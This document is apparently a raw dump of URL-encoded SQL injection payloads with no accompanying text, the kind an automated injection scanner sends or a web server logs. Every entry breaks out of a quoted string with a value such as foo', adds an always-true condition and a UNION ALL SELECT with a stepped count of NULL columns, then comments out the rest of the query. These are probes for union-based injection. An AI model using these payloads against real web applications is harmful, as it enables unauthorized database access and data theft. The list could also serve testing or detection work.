foo%27%7C%7C%28SELECT%20%27BaIz%27%20FROM%20DUAL%20WHERE%204671%3D4671%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27gBIc%27%20FROM%20DUAL%20WHERE%209264%3D9264%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27TVVc%27%20FROM%20DUAL%20WHERE%205152%3D5152%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27zZNh%27%20FROM%20DUAL%20WHERE%203534%3D3534%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27YWdm%27%20FROM%20DUAL%20WHERE%206675%3D6675%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27CbYM%27%20FROM%20DUAL%20WHERE%202858%3D2858%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27uWTG%27%20WHERE%201665%3D1665%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27tjpj%27%20WHERE%203206%3D3206%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27tDDo%27%20WHERE%203286%3D3286%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27oSKt%27%20WHERE%205785%3D5785%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27KXDH%27%20WHERE%209471%3D9471%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27lomv%27%20WHERE%207074%3D7074%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27MCoC%27%20WHERE%207288%3D7288%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27NwfZ%27%20WHERE%206269%3D6269%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27jecD%27%20WHERE%202252%3D2252%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27noYl%27%20WHERE%206592%3D6592%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20JdbH%20WHERE%201479%3D1479%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20dfXh%20WHERE%202458%3D2458%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20QpvQ%20WHERE%207813%3D7813%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20DQYZ%20WHERE%208792%3D8792%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20VuKi%20WHERE%207623%3D7623%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20DIrr%20WHERE%204222%3D4222%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20ttsu%20WHERE%206365%3D6365%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20Dutu%20WHERE%205344%3D5344%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20uPsb%20WHERE%209786%3D9786%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20aXty%20WHERE%205812%3D5812%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27jZcw%27%20WHERE%206722%3D6722%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27ZYwP%27%20WHERE%209514%3D9514%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27aKgD%27%20WHERE%202392%3D2392%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27RuSd%27%20WHERE%203232%3D3232%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27hPEu%27%20WHERE%208436%3D8436%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27HInD%27%20WHERE%206264%3D6264%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27VnqS%27%20WHERE%206909%3D6909%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27EhvG%27%20WHERE%209686%3D9686%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27ndRJ%27%20WHERE%201205%3D1205%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27wkBs%27%20WHERE%202251%3D2251%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 